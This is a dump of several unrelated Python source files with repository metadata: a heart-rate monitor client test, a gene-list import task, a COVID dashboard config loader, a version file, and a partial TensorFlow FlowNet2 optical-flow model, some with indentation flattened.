        json_resp: Information from the server.
    Returns:
        dict: The original dictionary if not error.
    """
    if type(json_resp) == dict and "error_type" in json_resp.keys():
        if "TypeError" in json_resp["error_type"]:
            raise TypeError(json_resp["msg"])
        if "AttributeError" in json_resp["error_type"]:
            raise AttributeError(json_resp["msg"])
        if "ValueError" in json_resp["error_type"]:
            raise ValueError(json_resp["msg"])
    return json_resp


if __name__ == "__main__":
    from random import choice
    from string import ascii_uppercase

    p_id = ''.join(choice(ascii_uppercase) for _ in range(10))
    print(p_id)
    r = add_new_patient(p_id, "szx2@duke.edu", 21)
    print(r)
    r = post_heart_rate(p_id, 80)
    print("Posted: ", r)
    hr = get_heart_rate(p_id)
    print("All Heartrates:", hr)
    r = post_heart_rate(p_id, 90)
    print("Posted: ", r)
    av = get_heart_rate_average(p_id)
    print("Average: ", av)
    hr = get_heart_rate(p_id)
    print("All Heartrates:", hr)
    curr_status, timestamp = get_patient_status(p_id)
    print("Current Status 1 (False/Not Tach): ", curr_status, "Timestamp: ", timestamp)
    int_avg = get_interval_average(p_id, timestamp)
    print("Interval Average (should be 85):", int_avg)
    r = post_heart_rate(p_id, 100)
    print("Posted: ", r)
    hr = get_heart_rate(p_id)
    print("All Heartrates:", hr)
    r = post_heart_rate(p_id, 110)
    curr_status, _ = get_patient_status(p_id)
    print("Current Status 2 (True/Tach + sends email): ", curr_status, "Timestamp: ", timestamp)
    av = get_heart_rate_average(p_id)
    print("Average (95): ", av)
    int_avg = get_interval_average(p_id, timestamp)
    print("Interval Average (should be 85):", int_avg)
avg_line_length: 26.169725 | max_line_length: 96 | alphanum_fraction: 0.632954
count_classes: 0 | score_classes: 0 | count_generators: 0 | score_generators: 0 | count_decorators: 0 | score_decorators: 0
count_async_functions: 0 | score_async_functions: 0 | count_documentation: 3,032 | score_documentation: 0.531464
hexsha: a1dba833aadc169502823d1b0bf416f69fbfd572 | size: 1,845 | ext: py | lang: Python
max_stars_repo: upload/tasks/import_gene_list_task.py | SACGF/variantgrid | 515195e2f03a0da3a3e5f2919d8e0431babfd9c9 | ["RSA-MD"] | stars: 5 | 2021-01-14T03:34:42.000Z | 2022-03-07T15:34:18.000Z
max_issues_repo: upload/tasks/import_gene_list_task.py | SACGF/variantgrid | 515195e2f03a0da3a3e5f2919d8e0431babfd9c9 | ["RSA-MD"] | issues: 551 | 2020-10-19T00:02:38.000Z | 2022-03-30T02:18:22.000Z
max_forks_repo: upload/tasks/import_gene_list_task.py | SACGF/variantgrid | 515195e2f03a0da3a3e5f2919d8e0431babfd9c9 | ["RSA-MD"] | forks: null | null | null
content:
from genes.gene_matching import tokenize_gene_symbols, GeneSymbolMatcher
from genes.models import GeneList
from snpdb.models import ImportStatus
from upload.models import UploadedGeneList
from upload.tasks.import_task import ImportTask
from variantgrid.celery import app


def create_gene_list(user, category, name, gene_names_set, modification_info=None, gene_matcher=None):
    if gene_matcher is None:
        gene_matcher = GeneSymbolMatcher()

    gene_list = GeneList(category=category, name=name, user=user, import_status=ImportStatus.IMPORTING)
    gene_list.save()
    if gene_names_set:
        gene_matcher.create_gene_list_gene_symbols(gene_list, gene_names_set, modification_info)
    gene_list.import_status = ImportStatus.SUCCESS
    gene_list.save()
    return gene_list


class ImportGeneListTask(ImportTask):
    MIN_GENES_TO_USE_CACHING_GENE_MATCHER = 10

    def process_items(self, uploaded_file):
        uploaded_gene_list, _ = UploadedGeneList.objects.get_or_create(uploaded_file=uploaded_file)

        with open(uploaded_file.get_filename()) as f:
            gene_list_data = f.read()
        gene_names_set = tokenize_gene_symbols(gene_list_data)

        if len(gene_names_set) > self.MIN_GENES_TO_USE_CACHING_GENE_MATCHER:
            gene_matcher = GeneSymbolMatcher()
        else:
            gene_matcher = None

        modification_info = "From uploaded gene_list: %s" % uploaded_file.get_filename()
        gene_list = create_gene_list(uploaded_file.user, None, uploaded_file.name, gene_names_set, modification_info,
                                     gene_matcher=gene_matcher)

        uploaded_gene_list.gene_list = gene_list
        uploaded_gene_list.save()

        return gene_list.genelistgenesymbol_set.count()


ImportGeneListTask = app.register_task(ImportGeneListTask())  # @UndefinedVariable
avg_line_length: 37.653061 | max_line_length: 117 | alphanum_fraction: 0.750678
count_classes: 968 | score_classes: 0.524661 | count_generators: 0 | score_generators: 0 | count_decorators: 0 | score_decorators: 0
count_async_functions: 0 | score_async_functions: 0 | count_documentation: 49 | score_documentation: 0.026558
hexsha: a1dd42d9f4784232b6f6958623ffb26f5fc9185f | size: 467 | ext: py | lang: Python
max_stars_repo: Covid Dashboard/loadconfig.py | jamespilcher/daily-covid-dashboard | 4f71eba2216dcda4b577baeb37a97a3abf4fe1bd | ["MIT"] | stars: null | null | null
max_issues_repo: Covid Dashboard/loadconfig.py | jamespilcher/daily-covid-dashboard | 4f71eba2216dcda4b577baeb37a97a3abf4fe1bd | ["MIT"] | issues: null | null | null
max_forks_repo: Covid Dashboard/loadconfig.py | jamespilcher/daily-covid-dashboard | 4f71eba2216dcda4b577baeb37a97a3abf4fe1bd | ["MIT"] | forks: null | null | null
content:
"""Loads the config.json file and store key value pairs into variables"""
import json
with open('config.json', 'r', encoding='utf-8') as f:
config = json.load(f)
config_location_type = config['location_type']
config_location = config['location']
country = config['country']
config_covid_terms = config['covid_terms']
newsAPI_key = config['newsAPI_key']
news_outlet_websites = config['news_outlet_websites']
webpage_url = config["local_host_url"]
avg_line_length: 31.133333 | max_line_length: 74 | alphanum_fraction: 0.734475
count_classes: 0 | score_classes: 0 | count_generators: 0 | score_generators: 0 | count_decorators: 0 | score_decorators: 0
count_async_functions: 0 | score_async_functions: 0 | count_documentation: 194 | score_documentation: 0.415418
hexsha: a1de14ec6277bfec1f83bc1158b25a9e6f73c868 | size: 65 | ext: py | lang: Python
max_stars_repo: autoprotocol/version.py | kevin-ss-kim/autoprotocol-python | f55818e31b5c49bc093291f3ecc452f2b061e0a9 | ["BSD-3-Clause"] | stars: null | null | null
max_issues_repo: autoprotocol/version.py | kevin-ss-kim/autoprotocol-python | f55818e31b5c49bc093291f3ecc452f2b061e0a9 | ["BSD-3-Clause"] | issues: null | null | null
max_forks_repo: autoprotocol/version.py | kevin-ss-kim/autoprotocol-python | f55818e31b5c49bc093291f3ecc452f2b061e0a9 | ["BSD-3-Clause"] | forks: null | null | null
content:
"""Maintains current version of package"""
__version__ = "6.1.2"
avg_line_length: 21.666667 | max_line_length: 42 | alphanum_fraction: 0.707692
count_classes: 0 | score_classes: 0 | count_generators: 0 | score_generators: 0 | count_decorators: 0 | score_decorators: 0
count_async_functions: 0 | score_async_functions: 0 | count_documentation: 49 | score_documentation: 0.753846
hexsha: a1df17bbb39f33b932712fb69914ace1053665c5 | size: 51,350 | ext: py | lang: Python
max_stars_repo: models/flownet2.py | D-Nilsson/GRFP | 539fe2a9ecbd5daf60e20ce56af872d90ba60a4b | ["MIT"] | stars: 58 | 2018-06-13T13:58:51.000Z | 2022-03-08T03:07:10.000Z
max_issues_repo: models/flownet2.py | yyyyqy/GRFP | 539fe2a9ecbd5daf60e20ce56af872d90ba60a4b | ["MIT"] | issues: 13 | 2018-07-10T07:50:54.000Z | 2021-06-09T17:55:16.000Z
max_forks_repo: models/flownet2.py | yyyyqy/GRFP | 539fe2a9ecbd5daf60e20ce56af872d90ba60a4b | ["MIT"] | forks: 11 | 2018-06-13T17:00:42.000Z | 2022-03-01T03:15:24.000Z
content:
import glob, os
import numpy as np
import tensorflow as tf
import tensorflow.contrib.graph_editor as ge
class Flownet2:
def __init__(self, bilinear_warping_module):
self.weights = dict()
for key, shape in self.all_variables():
self.weights[key] = tf.get_variable(key, shape=shape)
self.bilinear_warping_module = bilinear_warping_module
def leaky_relu(self, x, s):
assert s > 0 and s < 1, "Wrong s"
return tf.maximum(x, s*x)
def warp(self, x, flow):
return self.bilinear_warping_module.bilinear_warping(x, tf.stack([flow[:,:,:,1], flow[:,:,:,0]], axis=3))
# flip true -> [:,:,:,0] y axis downwards
# [:,:,:,1] x axis
# as in matrix indexing
#
# false returns 0->x, 1->y
def __call__(self, im0, im1, flip=True):
f = self.get_blobs(im0, im1)['predict_flow_final']
if flip:
f = tf.stack([f[:,:,:,1], f[:,:,:,0]], axis=3)
return f
def get_optimizer(self, flow, target, learning_rate=1e-4):
#flow = self.__call__(im0, im1)
loss = tf.reduce_sum(flow * target) # target holding the gradients!
opt = tf.train.AdamOptimizer(learning_rate=learning_rate, beta1=0.95, beta2=0.99, epsilon=1e-8)
opt = opt.minimize(loss, var_list=
# [v for k,v in self.weights.iteritems() if (k.startswith('net3_') or k.startswith('netsd_') or k.startswith('fuse_'))])
[v for k,v in self.weights.iteritems() if ((k.startswith('net3_') or k.startswith('netsd_') or k.startswith('fuse_')) and not ('upsample' in k or 'deconv' in k))])
return opt, loss
# If I run the network with large images (1024x2048) it crashes due to memory
# constraints on a 12Gb titan X.
# See https://github.com/tensorflow/tensorflow/issues/5816#issuecomment-268710077
# for a possible explanation. I fix it by adding run_after in the section with
# the correlation layer so that 441 large tensors are not allocated at the same time
def run_after(self, a_tensor, b_tensor):
"""Force a to run after b"""
ge.reroute.add_control_inputs(a_tensor.op, [b_tensor.op])
# without epsilon I get nan-errors when I backpropagate
def l2_norm(self, x):
return tf.sqrt(tf.maximum(1e-5, tf.reduce_sum(x**2, axis=3, keep_dims=True)))
def get_blobs(self, im0, im1):
blobs = dict()
batch_size = tf.to_int32(tf.shape(im0)[0])
width = tf.to_int32(tf.shape(im0)[2])
height = tf.to_int32(tf.shape(im0)[1])
TARGET_WIDTH = width
TARGET_HEIGHT = height
divisor = 64.
ADAPTED_WIDTH = tf.to_int32(tf.ceil(tf.to_float(width)/divisor) * divisor)
ADAPTED_HEIGHT = tf.to_int32(tf.ceil(tf.to_float(height)/divisor) * divisor)
SCALE_WIDTH = tf.to_float(width) / tf.to_float(ADAPTED_WIDTH);
SCALE_HEIGHT = tf.to_float(height) / tf.to_float(ADAPTED_HEIGHT);
blobs['img0'] = im0
blobs['img1'] = im1
blobs['img0s'] = blobs['img0']*0.00392156862745098
blobs['img1s'] = blobs['img1']*0.00392156862745098
#mean = np.array([0.411451, 0.432060, 0.450141])
mean = np.array([0.37655231, 0.39534855, 0.40119368])
blobs['img0_nomean'] = blobs['img0s'] - mean
blobs['img1_nomean'] = blobs['img1s'] - mean
blobs['img0_nomean_resize'] = tf.image.resize_bilinear(blobs['img0_nomean'], size=[ADAPTED_HEIGHT, ADAPTED_WIDTH], align_corners=True)
blobs['img1_nomean_resize'] = tf.image.resize_bilinear(blobs['img1_nomean'], size=[ADAPTED_HEIGHT, ADAPTED_WIDTH], align_corners=True)
blobs['conv1a'] = tf.pad(blobs['img0_nomean_resize'], [[0,0], [3,3], [3,3], [0,0]])
blobs['conv1a'] = tf.nn.conv2d(blobs['conv1a'], self.weights['conv1_w'], strides=[1,2,2,1], padding="VALID") + self.weights['conv1_b']
blobs['conv1a'] = self.leaky_relu(blobs['conv1a'], 0.1)
blobs['conv1b'] = tf.pad(blobs['img1_nomean_resize'], [[0,0], [3,3], [3,3], [0,0]])
blobs['conv1b'] = tf.nn.conv2d(blobs['conv1b'], self.weights['conv1_w'], strides=[1,2,2,1], padding="VALID") + self.weights['conv1_b']
blobs['conv1b'] = self.leaky_relu(blobs['conv1b'], 0.1)
blobs['conv2a'] = tf.pad(blobs['conv1a'], [[0,0], [2,2], [2,2], [0,0]])
blobs['conv2a'] = tf.nn.conv2d(blobs['conv2a'], self.weights['conv2_w'], strides=[1,2,2,1], padding="VALID") + self.weights['conv2_b']
blobs['conv2a'] = self.leaky_relu(blobs['conv2a'], 0.1)
blobs['conv2b'] = tf.pad(blobs['conv1b'], [[0,0], [2,2], [2,2], [0,0]])
blobs['conv2b'] = tf.nn.conv2d(blobs['conv2b'], self.weights['conv2_w'], strides=[1,2,2,1], padding="VALID") + self.weights['conv2_b']
blobs['conv2b'] = self.leaky_relu(blobs['conv2b'], 0.1)
blobs['conv3a'] = tf.pad(blobs['conv2a'], [[0,0], [2,2], [2,2], [0,0]])
blobs['conv3a'] = tf.nn.conv2d(blobs['conv3a'], self.weights['conv3_w'], strides=[1,2,2,1], padding="VALID") + self.weights['conv3_b']
blobs['conv3a'] = self.leaky_relu(blobs['conv3a'], 0.1)
blobs['conv3b'] = tf.pad(blobs['conv2b'], [[0,0], [2,2], [2,2], [0,0]])
blobs['conv3b'] = tf.nn.conv2d(blobs['conv3b'], self.weights['conv3_w'], strides=[1,2,2,1], padding="VALID") + self.weights['conv3_b']
blobs['conv3b'] = self.leaky_relu(blobs['conv3b'], 0.1)
# this might be considered a bit hacky
tmp = []
x1_l = []
x2_l = []
for di in range(-20, 21, 2):
for dj in range(-20, 21, 2):
x1 = tf.pad(blobs['conv3a'], [[0,0], [20,20], [20,20], [0,0]])
x2 = tf.pad(blobs['conv3b'], [[0,0], [20-di,20+di], [20-dj,20+dj], [0,0]])
x1_l.append(x1)
x2_l.append(x2)
c = tf.nn.conv2d(x1*x2, tf.ones([1, 1, 256, 1])/256., strides=[1,1,1,1], padding='VALID')
tmp.append(c[:,20:-20,20:-20,:])
for i in range(len(tmp)-1):
#self.run_after(tmp[i], tmp[i+1])
self.run_after(x1_l[i], tmp[i+1])
self.run_after(x2_l[i], tmp[i+1])
blobs['corr'] = tf.concat(tmp, axis=3)
blobs['corr'] = self.leaky_relu(blobs['corr'], 0.1)
blobs['conv_redir'] = tf.nn.conv2d(blobs['conv3a'], self.weights['conv_redir_w'], strides=[1,1,1,1], padding="VALID") + self.weights['conv_redir_b']
blobs['conv_redir'] = self.leaky_relu(blobs['conv_redir'], 0.1)
blobs['blob16'] = tf.concat([blobs['conv_redir'], blobs['corr']], axis=3)
blobs['conv3_1'] = tf.nn.conv2d(blobs['blob16'], self.weights['conv3_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['conv3_1_b']
blobs['conv3_1'] = self.leaky_relu(blobs['conv3_1'], 0.1)
blobs['conv4'] = tf.pad(blobs['conv3_1'], [[0,0], [1,1], [1,1], [0,0]])
blobs['conv4'] = tf.nn.conv2d(blobs['conv4'], self.weights['conv4_w'], strides=[1,2,2,1], padding="VALID") + self.weights['conv4_b']
blobs['conv4'] = self.leaky_relu(blobs['conv4'], 0.1)
blobs['conv4_1'] = tf.nn.conv2d(blobs['conv4'], self.weights['conv4_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['conv4_1_b']
blobs['conv4_1'] = self.leaky_relu(blobs['conv4_1'], 0.1)
blobs['conv5'] = tf.pad(blobs['conv4_1'], [[0,0], [1,1], [1,1], [0,0]])
blobs['conv5'] = tf.nn.conv2d(blobs['conv5'], self.weights['conv5_w'], strides=[1,2,2,1], padding="VALID") + self.weights['conv5_b']
blobs['conv5'] = self.leaky_relu(blobs['conv5'], 0.1)
blobs['conv5_1'] = tf.nn.conv2d(blobs['conv5'], self.weights['conv5_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['conv5_1_b']
blobs['conv5_1'] = self.leaky_relu(blobs['conv5_1'], 0.1)
blobs['conv6'] = tf.pad(blobs['conv5_1'], [[0,0], [1,1], [1,1], [0,0]])
blobs['conv6'] = tf.nn.conv2d(blobs['conv6'], self.weights['conv6_w'], strides=[1,2,2,1], padding="VALID") + self.weights['conv6_b']
blobs['conv6'] = self.leaky_relu(blobs['conv6'], 0.1)
blobs['conv6_1'] = tf.nn.conv2d(blobs['conv6'], self.weights['conv6_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['conv6_1_b']
blobs['conv6_1'] = self.leaky_relu(blobs['conv6_1'], 0.1)
blobs['predict_flow6'] = tf.nn.conv2d(blobs['conv6_1'], self.weights['Convolution1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['Convolution1_b']
blobs['deconv5'] = tf.nn.conv2d_transpose(blobs['conv6_1'], self.weights['deconv5_w'], output_shape=[batch_size, ADAPTED_HEIGHT/32, ADAPTED_WIDTH/32, 512], strides=[1,2,2,1]) + self.weights['deconv5_b']
blobs['deconv5'] = self.leaky_relu(blobs['deconv5'], 0.1)
blobs['upsampled_flow6_to_5'] = tf.nn.conv2d_transpose(blobs['predict_flow6'], self.weights['upsample_flow6to5_w'], output_shape=[batch_size, ADAPTED_HEIGHT/32, ADAPTED_WIDTH/32, 2], strides=[1,2,2,1]) + self.weights['upsample_flow6to5_b']
blobs['concat5'] = tf.concat([blobs['conv5_1'], blobs['deconv5'], blobs['upsampled_flow6_to_5']], axis=3)
blobs['predict_flow5'] = tf.pad(blobs['concat5'], [[0,0], [1,1], [1,1], [0,0]])
blobs['predict_flow5'] = tf.nn.conv2d(blobs['predict_flow5'], self.weights['Convolution2_w'], strides=[1,1,1,1], padding="VALID") + self.weights['Convolution2_b']
blobs['deconv4'] = tf.nn.conv2d_transpose(blobs['concat5'], self.weights['deconv4_w'], output_shape=[batch_size, ADAPTED_HEIGHT/16, ADAPTED_WIDTH/16, 256], strides=[1,2,2,1]) + self.weights['deconv4_b']
blobs['deconv4'] = self.leaky_relu(blobs['deconv4'], 0.1)
blobs['upsampled_flow5_to_4'] = tf.nn.conv2d_transpose(blobs['predict_flow5'], self.weights['upsample_flow5to4_w'], output_shape=[batch_size, ADAPTED_HEIGHT/16, ADAPTED_WIDTH/16, 2], strides=[1,2,2,1]) + self.weights['upsample_flow5to4_b']
blobs['concat4'] = tf.concat([blobs['conv4_1'], blobs['deconv4'], blobs['upsampled_flow5_to_4']], axis=3)
blobs['predict_flow4'] = tf.nn.conv2d(blobs['concat4'], self.weights['Convolution3_w'], strides=[1,1,1,1], padding="SAME") + self.weights['Convolution3_b']
blobs['deconv3'] = tf.nn.conv2d_transpose(blobs['concat4'], self.weights['deconv3_w'], output_shape=[batch_size, ADAPTED_HEIGHT/8, ADAPTED_WIDTH/8, 128], strides=[1,2,2,1]) + self.weights['deconv3_b']
blobs['deconv3'] = self.leaky_relu(blobs['deconv3'], 0.1)
blobs['upsampled_flow4_to_3'] = tf.nn.conv2d_transpose(blobs['predict_flow4'], self.weights['upsample_flow4to3_w'], output_shape=[batch_size, ADAPTED_HEIGHT/8, ADAPTED_WIDTH/8, 2], strides=[1,2,2,1]) + self.weights['upsample_flow4to3_b']
blobs['concat3'] = tf.concat([blobs['conv3_1'], blobs['deconv3'], blobs['upsampled_flow4_to_3']], axis=3)
blobs['predict_flow3'] = tf.nn.conv2d(blobs['concat3'], self.weights['Convolution4_w'], strides=[1,1,1,1], padding="SAME") + self.weights['Convolution4_b']
blobs['deconv2'] = tf.nn.conv2d_transpose(blobs['concat3'], self.weights['deconv2_w'], output_shape=[batch_size, ADAPTED_HEIGHT/4, ADAPTED_WIDTH/4, 64], strides=[1,2,2,1]) + self.weights['deconv2_b']
blobs['deconv2'] = self.leaky_relu(blobs['deconv2'], 0.1)
blobs['upsampled_flow3_to_2'] = tf.nn.conv2d_transpose(blobs['predict_flow3'], self.weights['upsample_flow3to2_w'], output_shape=[batch_size, ADAPTED_HEIGHT/4, ADAPTED_WIDTH/4, 2], strides=[1,2,2,1]) + self.weights['upsample_flow3to2_b']
blobs['concat2'] = tf.concat([blobs['conv2a'], blobs['deconv2'], blobs['upsampled_flow3_to_2']], axis=3)
blobs['predict_flow2'] = tf.nn.conv2d(blobs['concat2'], self.weights['Convolution5_w'], strides=[1,1,1,1], padding="SAME") + self.weights['Convolution5_b']
blobs['blob41'] = blobs['predict_flow2'] * 20.
blobs['blob42'] = tf.image.resize_bilinear(blobs['blob41'], size=[ADAPTED_HEIGHT, ADAPTED_WIDTH], align_corners=True)
blobs['blob43'] = self.warp(blobs['img1_nomean_resize'], blobs['blob42'])
blobs['blob44'] = blobs['img0_nomean_resize'] - blobs['blob43']
#blobs['blob45'] = tf.sqrt(1e-8+tf.reduce_sum(blobs['blob44']**2, axis=3, keep_dims=True))
blobs['blob45'] = self.l2_norm(blobs['blob44'])
blobs['blob46'] = 0.05*blobs['blob42']
blobs['blob47'] = tf.concat([blobs['img0_nomean_resize'], blobs['img1_nomean_resize'], blobs['blob43'], blobs['blob46'], blobs['blob45']], axis=3)
####################################################################################
####################################################################################
####################################################################################
###################### END OF THE FIRST BRANCH #####################################
####################################################################################
####################################################################################
####################################################################################
blobs['blob48'] = tf.pad(blobs['blob47'], [[0,0], [3,3], [3,3], [0,0]])
blobs['blob48'] = tf.nn.conv2d(blobs['blob48'], self.weights['net2_conv1_w'], strides=[1,2,2,1], padding="VALID") + self.weights['net2_conv1_b']
blobs['blob48'] = self.leaky_relu(blobs['blob48'], 0.1)
blobs['blob49'] = tf.pad(blobs['blob48'], [[0,0], [2,2], [2, 2], [0,0]])
blobs['blob49'] = tf.nn.conv2d(blobs['blob49'], self.weights['net2_conv2_w'], strides=[1,2,2,1], padding="VALID") + self.weights['net2_conv2_b']
blobs['blob49'] = self.leaky_relu(blobs['blob49'], 0.1)
blobs['blob50'] = tf.pad(blobs['blob49'], [[0,0], [2,2], [2,2], [0,0]])
blobs['blob50'] = tf.nn.conv2d(blobs['blob50'], self.weights['net2_conv3_w'], strides=[1,2,2,1], padding="VALID") + self.weights['net2_conv3_b']
blobs['blob50'] = self.leaky_relu(blobs['blob50'], 0.1)
blobs['blob51'] = tf.nn.conv2d(blobs['blob50'], self.weights['net2_conv3_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['net2_conv3_1_b']
blobs['blob51'] = self.leaky_relu(blobs['blob51'], 0.1)
blobs['blob52'] = tf.pad(blobs['blob51'], [[0,0], [1,1], [1,1], [0,0]])
blobs['blob52'] = tf.nn.conv2d(blobs['blob52'], self.weights['net2_conv4_w'], strides=[1,2,2,1], padding="VALID") + self.weights['net2_conv4_b']
blobs['blob52'] = self.leaky_relu(blobs['blob52'], 0.1)
blobs['blob53'] = tf.nn.conv2d(blobs['blob52'], self.weights['net2_conv4_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['net2_conv4_1_b']
blobs['blob53'] = self.leaky_relu(blobs['blob53'], 0.1)
blobs['blob54'] = tf.pad(blobs['blob53'], [[0,0], [1,1], [1,1], [0,0]])
blobs['blob54'] = tf.nn.conv2d(blobs['blob54'], self.weights['net2_conv5_w'], strides=[1,2,2,1], padding="VALID") + self.weights['net2_conv5_b']
blobs['blob54'] = self.leaky_relu(blobs['blob54'], 0.1)
blobs['blob55'] = tf.nn.conv2d(blobs['blob54'], self.weights['net2_conv5_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['net2_conv5_1_b']
blobs['blob55'] = self.leaky_relu(blobs['blob55'], 0.1)
blobs['blob56'] = tf.pad(blobs['blob55'], [[0,0], [1,1], [1,1], [0,0]])
blobs['blob56'] = tf.nn.conv2d(blobs['blob56'], self.weights['net2_conv6_w'], strides=[1,2,2,1], padding="VALID") + self.weights['net2_conv6_b']
blobs['blob56'] = self.leaky_relu(blobs['blob56'], 0.1)
blobs['blob57'] = tf.nn.conv2d(blobs['blob56'], self.weights['net2_conv6_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['net2_conv6_1_b']
blobs['blob57'] = self.leaky_relu(blobs['blob57'], 0.1)
blobs['blob58'] = tf.nn.conv2d(blobs['blob57'], self.weights['net2_predict_conv6_w'], strides=[1,1,1,1], padding="SAME") + self.weights['net2_predict_conv6_b']
blobs['blob59'] = tf.nn.conv2d_transpose(blobs['blob57'], self.weights['net2_deconv5_w'], output_shape=[batch_size, ADAPTED_HEIGHT/32, ADAPTED_WIDTH/32, 512], strides=[1,2,2,1]) + self.weights['net2_deconv5_b']
blobs['blob59'] = self.leaky_relu(blobs['blob59'], 0.1)
blobs['blob60'] = tf.nn.conv2d_transpose(blobs['predict_flow6'], self.weights['net2_net2_upsample_flow6to5_w'], output_shape=[batch_size, ADAPTED_HEIGHT/32, ADAPTED_WIDTH/32, 2], strides=[1,2,2,1]) + self.weights['net2_net2_upsample_flow6to5_b']
blobs['blob61'] = tf.concat([blobs['blob55'], blobs['blob59'], blobs['blob60']], axis=3)
blobs['blob62'] = tf.nn.conv2d(blobs['blob61'], self.weights['net2_predict_conv5_w'], strides=[1,1,1,1], padding="SAME") + self.weights['net2_predict_conv5_b']
blobs['blob63'] = tf.nn.conv2d_transpose(blobs['blob61'], self.weights['net2_deconv4_w'], output_shape=[batch_size, ADAPTED_HEIGHT/16, ADAPTED_WIDTH/16, 256], strides=[1,2,2,1]) + self.weights['net2_deconv4_b']
blobs['blob63'] = self.leaky_relu(blobs['blob63'], 0.1)
blobs['blob64'] = tf.nn.conv2d_transpose(blobs['blob62'], self.weights['net2_net2_upsample_flow5to4_w'], output_shape=[batch_size, ADAPTED_HEIGHT/16, ADAPTED_WIDTH/16, 2], strides=[1,2,2,1]) + self.weights['net2_net2_upsample_flow5to4_b']
blobs['blob65'] = tf.concat([blobs['blob53'], blobs['blob63'], blobs['blob64']], axis=3)
blobs['blob66'] = tf.nn.conv2d(blobs['blob65'], self.weights['net2_predict_conv4_w'], strides=[1,1,1,1], padding="SAME") + self.weights['net2_predict_conv4_b']
blobs['blob67'] = tf.nn.conv2d_transpose(blobs['blob65'], self.weights['net2_deconv3_w'], output_shape=[batch_size, ADAPTED_HEIGHT/8, ADAPTED_WIDTH/8, 128], strides=[1,2,2,1]) + self.weights['net2_deconv3_b']
blobs['blob67'] = self.leaky_relu(blobs['blob67'], 0.1)
blobs['blob68'] = tf.nn.conv2d_transpose(blobs['blob66'], self.weights['net2_net2_upsample_flow4to3_w'], output_shape=[batch_size, ADAPTED_HEIGHT/8, ADAPTED_WIDTH/8, 2], strides=[1,2,2,1]) + self.weights['net2_net2_upsample_flow4to3_b']
blobs['blob69'] = tf.concat([blobs['blob51'], blobs['blob67'], blobs['blob68']], axis=3)
blobs['blob70'] = tf.nn.conv2d(blobs['blob69'], self.weights['net2_predict_conv3_w'], strides=[1,1,1,1], padding="SAME") + self.weights['net2_predict_conv3_b']
blobs['blob71'] = tf.nn.conv2d_transpose(blobs['blob69'], self.weights['net2_deconv2_w'], output_shape=[batch_size, ADAPTED_HEIGHT/4, ADAPTED_WIDTH/4, 64], strides=[1,2,2,1]) + self.weights['net2_deconv2_b']
blobs['blob71'] = self.leaky_relu(blobs['blob71'], 0.1)
blobs['blob72'] = tf.nn.conv2d_transpose(blobs['blob70'], self.weights['net2_net2_upsample_flow3to2_w'], output_shape=[batch_size, ADAPTED_HEIGHT/4, ADAPTED_WIDTH/4, 2], strides=[1,2,2,1]) + self.weights['net2_net2_upsample_flow3to2_b']
blobs['blob73'] = tf.concat([blobs['blob49'], blobs['blob71'], blobs['blob72']], axis=3)
blobs['blob74'] = tf.nn.conv2d(blobs['blob73'], self.weights['net2_predict_conv2_w'], strides=[1,1,1,1], padding="SAME") + self.weights['net2_predict_conv2_b']
blobs['blob75'] = blobs['blob74'] * 20.
blobs['blob76'] = tf.image.resize_bilinear(blobs['blob75'], size=[ADAPTED_HEIGHT, ADAPTED_WIDTH], align_corners=True)
blobs['blob77'] = self.warp(blobs['img1_nomean_resize'], blobs['blob76'])
blobs['blob78'] = blobs['img0_nomean_resize'] - blobs['blob77']
#blobs['blob79'] = tf.sqrt(1e-8+tf.reduce_sum(blobs['blob78']**2, axis=3, keep_dims=True))
blobs['blob79'] = self.l2_norm(blobs['blob78'])
blobs['blob80'] = 0.05*blobs['blob76']
blobs['blob81'] = tf.concat([blobs['img0_nomean_resize'], blobs['img1_nomean_resize'], blobs['blob77'], blobs['blob80'], blobs['blob79']], axis=3)
####################################################################################
####################################################################################
####################################################################################
###################### END OF THE SECOND BRANCH ####################################
####################################################################################
####################################################################################
####################################################################################
blobs['blob82'] = tf.pad(blobs['blob81'], [[0,0], [3,3], [3,3], [0,0]])
blobs['blob82'] = tf.nn.conv2d(blobs['blob82'], self.weights['net3_conv1_w'], strides=[1,2,2,1], padding="VALID") + self.weights['net3_conv1_b']
blobs['blob82'] = self.leaky_relu(blobs['blob82'], 0.1)
blobs['blob83'] = tf.pad(blobs['blob82'], [[0,0], [2,2], [2, 2], [0,0]])
blobs['blob83'] = tf.nn.conv2d(blobs['blob83'], self.weights['net3_conv2_w'], strides=[1,2,2,1], padding="VALID") + self.weights['net3_conv2_b']
blobs['blob83'] = self.leaky_relu(blobs['blob83'], 0.1)
blobs['blob84'] = tf.pad(blobs['blob83'], [[0,0], [2,2], [2,2], [0,0]])
blobs['blob84'] = tf.nn.conv2d(blobs['blob84'], self.weights['net3_conv3_w'], strides=[1,2,2,1], padding="VALID") + self.weights['net3_conv3_b']
blobs['blob84'] = self.leaky_relu(blobs['blob84'], 0.1)
blobs['blob85'] = tf.nn.conv2d(blobs['blob84'], self.weights['net3_conv3_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['net3_conv3_1_b']
blobs['blob85'] = self.leaky_relu(blobs['blob85'], 0.1)
blobs['blob86'] = tf.pad(blobs['blob85'], [[0,0], [1,1], [1,1], [0,0]])
blobs['blob86'] = tf.nn.conv2d(blobs['blob86'], self.weights['net3_conv4_w'], strides=[1,2,2,1], padding="VALID") + self.weights['net3_conv4_b']
blobs['blob86'] = self.leaky_relu(blobs['blob86'], 0.1)
blobs['blob87'] = tf.nn.conv2d(blobs['blob86'], self.weights['net3_conv4_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['net3_conv4_1_b']
blobs['blob87'] = self.leaky_relu(blobs['blob87'], 0.1)
blobs['blob88'] = tf.pad(blobs['blob87'], [[0,0], [1,1], [1,1], [0,0]])
blobs['blob88'] = tf.nn.conv2d(blobs['blob88'], self.weights['net3_conv5_w'], strides=[1,2,2,1], padding="VALID") + self.weights['net3_conv5_b']
blobs['blob88'] = self.leaky_relu(blobs['blob88'], 0.1)
blobs['blob89'] = tf.nn.conv2d(blobs['blob88'], self.weights['net3_conv5_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['net3_conv5_1_b']
